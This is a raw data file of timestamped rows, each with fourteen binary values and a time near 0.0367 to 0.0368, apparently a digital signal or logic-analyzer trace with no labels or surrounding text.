0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6673124e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673148e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6673172e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673196e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6673224e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673248e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6673252e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6673300e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6673324e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673332e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6673348e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673372e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6673380e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6673424e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6673452e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673456e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6673476e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673500e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6673524e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673548e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6673572e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6673604e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6673652e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6673676e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673684e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6673700e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673724e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6673752e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673776e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6673780e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6673804e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6673828e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,3.6673832e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673836e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6673876e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673900e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6673952e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6673976e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674004e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674028e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674052e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674076e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,3.6674080e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6674084e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6674100e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6674124e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674132e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674152e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674176e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674204e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674228e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674252e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674276e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674300e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674324e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674352e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674376e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674404e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674428e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674452e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674476e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674500e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674524e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6674532e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6674576e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6674604e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6674628e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6674652e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674660e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674676e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674700e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674724e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674752e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674772e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6674804e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6674852e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6674876e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674884e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674900e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674924e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6674952e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6674972e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675004e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675028e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675052e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675076e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,3.6675080e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6675084e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6675124e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6675152e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,3.6675156e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675160e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675172e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675204e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675228e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675252e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675276e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675300e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675324e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675352e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675404e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675428e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675452e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6675456e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6675500e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6675524e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675532e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675552e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675572e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675604e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675628e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675652e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675676e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,3.6675680e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6675684e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6675724e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6675752e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6675772e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675804e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675828e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675852e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675876e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675900e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6675924e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6675952e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6675956e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6676004e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6676028e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676036e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6676052e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676076e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,3.6676080e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6676084e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6676124e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6676152e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,3.6676156e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676160e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6676204e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676228e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6676276e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676300e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6676304e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6676324e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6676352e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676356e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6676376e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676404e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6676428e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676452e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6676476e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676500e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6676524e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676552e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6676576e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6676604e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6676628e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6676652e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6676676e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6676700e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6676724e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6676752e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676756e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6676804e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676828e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6676852e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6676876e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,3.6676880e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6676884e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6676924e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6676952e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6676976e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6677004e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677008e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677028e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677052e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677076e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677100e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677124e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677152e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6677156e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6677204e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6677228e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677236e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677252e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677276e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677300e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677324e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677352e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677376e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677404e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677428e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677452e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677476e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677500e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677524e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677552e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677576e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677604e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677628e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677652e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677676e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677700e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677724e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677752e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677776e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677804e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677828e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677852e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677876e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677900e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677924e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6677972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6677996e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6678020e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6678044e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6678072e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6678096e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6802512e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6802756e-02 1,1,1,0,0,0,0,0,0,0,0,1,0,1,3.6802788e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6802812e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.6803108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6803132e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.6803156e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6803180e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.6803204e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6803232e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.6803256e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6803284e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,3.6803308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.6803332e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,1,3.6803336e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,1,3.6803380e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6803408e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6803412e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6803432e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6803456e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6803484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6803508e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6803532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6803556e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6803580e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6803604e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6803632e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6803656e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6803684e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,3.6803708e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6803712e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6803756e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6803780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6803788e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6803804e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6803828e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6803836e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6803880e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6803904e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6803912e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6803932e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6803956e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6803980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804004e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804028e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804056e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804080e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804104e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804132e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804156e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804180e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804204e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804228e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804256e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804280e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804304e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804332e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804356e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804404e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804428e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804456e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6804460e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6804504e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6804532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804536e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804580e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804632e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804656e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804676e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804704e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804732e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804756e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804780e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804804e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804832e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804856e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804880e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804904e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804932e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6804956e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6804980e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6804988e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6805032e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6805056e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805064e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6805084e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805104e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6805132e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805156e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6805180e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805204e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6805212e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6805260e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6805284e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,3.6805288e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805292e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6805308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805332e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6805336e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6805380e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6805404e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805412e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6805456e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805484e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6805532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805556e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6805604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805632e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6805636e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6805684e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6805708e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805716e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6805756e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805780e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6805804e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805832e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6805856e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6805884e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6805908e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6805932e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6805956e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6805980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6805988e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806032e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806056e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806132e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806156e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806180e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806204e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806232e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806256e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806284e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806332e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806356e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806380e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806404e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806432e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806456e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806484e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806508e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806532e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806580e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6806588e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6806632e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6806656e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806664e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806684e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806708e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806732e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806756e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806804e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806832e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806856e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6806860e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6806908e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6806932e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806940e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6806956e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6806980e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807004e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807032e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807056e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807104e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6807132e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.6807180e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.6807204e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807212e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807232e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807256e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807284e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807304e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807332e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807356e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807404e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807432e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807456e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.6807484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.6807504e-02 